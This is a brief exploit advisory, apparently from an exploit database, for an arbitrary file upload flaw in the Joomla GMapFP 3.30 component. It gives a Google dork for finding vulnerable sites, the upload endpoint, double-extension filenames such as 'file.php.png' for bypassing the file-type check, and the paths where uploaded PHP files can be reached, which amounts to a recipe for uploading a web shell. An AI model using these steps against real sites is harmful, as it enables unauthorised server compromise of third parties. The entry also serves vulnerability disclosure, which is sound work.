Share
# Exploit Title: Joomla! Component GMapFP 3.30 - Arbitrary File Upload  
# Google Dork: inurl:''com_gmapfp''  
# Date: 2020-03-25  
# Exploit Author: ThelastVvV  
# Vendor Homepage:https://gmapfp.org/  
# Version:* Version J3.30pro  
# Tested on: Ubuntu  
  
# PoC:  
  
http://127.0.0.1/index.php?option=comgmapfp&controller=editlieux&tmpl=component&task=upload_image  
  
# you can bypass the the restriction by uploading your file.php.png , file2.php.jpeg , file3.html.jpg ,file3.txt.jpg   
  
# Dir File Path:  
  
http://127.0.0.1/images/gmapfp/file.php   
  
or  
  
http://127.0.0.1//images/gmapfp/file.php.png  
  
# The Joomla Gmapfp Components 3.x is allowing   
# remote attackers to upload arbitrary files upload/shell upload due the issues of unrestricted file uploads